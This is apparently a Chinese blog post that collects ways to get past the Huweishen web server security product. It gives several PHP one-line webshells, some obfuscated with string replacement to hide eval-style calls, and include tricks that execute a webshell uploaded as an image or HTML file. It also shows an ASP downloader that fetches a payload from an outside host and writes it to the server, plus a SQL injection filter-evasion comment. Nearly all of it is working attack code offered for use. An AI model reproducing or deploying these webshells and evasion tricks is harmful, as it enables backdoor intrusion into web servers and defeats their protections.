突破护卫神技术总汇
- 发表于
- 周边
一、马儿篇,都是以前可以过护卫神的马
二、注入篇,可以绕过注入的方法
三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿
一、马儿篇
1号马,
|
1 2 3 4 |
<?php @eval ($_POST['1']); ?> |
2号马,
|
1 2 3 4 5 6 7 |
nono <title>login</title> <?php eval ($_POST [1]) ?> |
3号马,
|
1 2 |
<?php $a = str_replace(x,”",”axsxxsxexrxxt”); $a($_POST["c"]); ?> |
菜刀直接连,不需要构造连接字符串,密码 c
类似于过安全狗的包含方法
A.asp版本:
将一句话保存为 XX.jpg 上传后 地址为 …/xxxxxx.jpg
在上传一个 x.asp 内容为
|
1 |
<!–#include file=”../xxxxxx.jpg”–> |
B.php版本
如果是php的话:
|
1 2 3 |
<?php include “1.htm”; ?> |
实在不行,还可以下载
远程下载马
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
<% Set xPost = CreateObject(“Microsoft.XMLHTTP”) xPost.Open “GET”,”http://www.yunsec.net/123/1.txt”,False xPost.Send() Set sGet = CreateObject(“ADODB.Stream”) sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile Server.MapPath(“ls.asp”),2 set sGet = nothing set sPOST = nothing %> |
二、注入篇
/*%00*/截断符
select/*%00*/* from admin;
三、规则篇
可以利用类似:
|
1 2 3 4 5 6 |
<?php $code=’一串base64′; //base64编码 $x=str_replace(‘f’,”",”bfafsfef6f4f_ffdffeffcffoffdffef”); //字符串替换 $a = ‘/a/’;//正则规则 preg_replace($a,’e’.’v’.’a’.’l’.’(‘.$x.’(‘.$code.’))’,'a’); //正则替换 ?> |
方法绕过关键词过滤
